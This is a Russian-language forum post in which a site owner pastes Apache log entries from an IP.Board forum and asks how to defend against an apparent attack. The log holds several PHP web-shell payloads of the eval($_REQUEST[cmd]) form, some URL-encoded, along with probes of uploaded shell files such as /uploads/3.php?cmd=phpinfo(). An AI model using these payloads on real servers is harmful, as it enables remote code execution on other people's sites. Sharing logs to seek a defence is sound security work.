Новичок
Покинул форум
Сообщений всего: 51
Дата рег-ции: Дек. 2013
Помог: 0 раз(а)
|
Всем привет! На днях листая логи апача увидел такое содержание:
CODE ( log):
скопировать код в буфер обмена
- - "GET /public/min/index.php?ipbv=32006&f=public/style_css/css_4/ipb_mlist_addon.css,public/style_css/css_4/ipb_help.css,public/style_css/css_4/calendar_select.css,public/style_css/css_4/ipb_common.css,public/style_css/css_4/ipb_styles.css HTTP/1.0" 200 15685 - - "GET /public/min/index.php?ipbv=&charset=UTF-8&f=public/js/ipb.js,cache/lang_cache/1/ipb.lang.js,public/js/ips.hovercard.js,public/js/ips.quickpm.js,public/js/ips.board.js HTTP/1.0" 200 31885 - - "GET /public/min/index.php?ipbv=&g=js HTTP/1.0" 200 45384 - - "GET /index.php HTTP/1.0" 200 66789 - - "GET /index.php?<?php error_reporting(0);print(___);eval($_REQUEST[cmd]);die; ?> HTTP/1.0" 200 66815 - - "GET /uploads/1.txt HTTP/1.0" 200 316 - - "GET /index.php?<?error_reporting(0);print(___);eval($_REQUEST[cmd]);die;?> HTTP/1.0" 200 66937 - - "GET /uploads/1.php HTTP/1.0" 200 370 - - "GET /index.php?<?error_reporting(0);print(___);eval($_REQUEST[cmd]);die;?> HTTP/1.0" 200 66937 - - "GET /1.php HTTP/1.0" 404 271 - - "GET /index.php HTTP/1.0" 200 66789 - - "GET /index.php?<?php eval($_REQUEST[cmd]); ?> HTTP/1.0" 200 66815 - - "GET /uploads/1.php HTTP/1.0" 500 - - - "GET /index.php?<?php error_reporting(0);\tprint(___);\teval($_REQUEST[cmd]);\tdie; ?> HTTP/1.0" 200 66815 - - "GET /uploads/3.php HTTP/1.0" 500 - - - "GET /uploads/3.php?cmd=phpinfo(); HTTP/1.0" 500 - - - "GET /index.php?<?php error_reporting(0);\tprint(___);\teval($_REQUEST[cmd]);\tdie; ?> HTTP/1.0" 200 66815 - - "GET /index.php?<?phpeval($_REQUEST[cmd]);?> HTTP/1.0" 200 66909 - - "GET /index.php?<?error_reporting(0);print(___);eval($_REQUEST[cmd]);die;?> HTTP/1.0" 200 66776 - - "GET /public/min/index.php?ipbv=32006&f=public/style_css/css_4/ipb_mlist_addon.css,public/style_css/css_4/calendar_select.css,public/style_css/css_4/ipb_common.css,public/style_css/css_4/ipb_styles.css,public/style_css/prettify.css HTTP/1.0" 200 15673 - - "GET /public/min/index.php?ipbv=&charset=UTF-8&f=public/js/ipb.js,cache/lang_cache/1/ipb.lang.js,public/js/ips.hovercard.js,public/js/ips.quickpm.js,public/js/ips.sharelinks.js,public/js/ips.topic.js,public/js/ips.like.js HTTP/1.0" 200 36474 - - "GET /index.php?<?php%20eval($_REQUEST[cmd]);%20?> HTTP/1.0" 200 67084 - - "GET /public/min/index.php?ipbv=32006&f=public/style_css/css_4/ipb_mlist_addon.css,public/style_css/css_4/ipb_help.css,public/style_css/css_4/calendar_select.css,public/style_css/css_4/ipb_common.css,public/style_css/css_4/ipb_styles.css HTTP/1.0" 304 - - - "GET /public/min/index.php?ipbv=&g=js HTTP/1.0" 304 - - - "GET /public/min/index.php?ipbv=&charset=UTF-8&f=public/js/ipb.js,cache/lang_cache/1/ipb.lang.js,public/js/ips.hovercard.js,public/js/ips.quickpm.js,public/js/ips.board.js HTTP/1.0" 304 - - - "GET /index.php?%3C%3Fphp+eval%28%24_REQUEST%5Bcmd%5D%29%3B+%3F%3E HTTP/1.0" 200 66724
Залитый файл через GET, как, как защитится? Кто то сталкивался с таким методом взлома, помогите советом по защите/обработке от подобного вида взлома.
Заранее благодарен за любые подсказки и комментарии!
|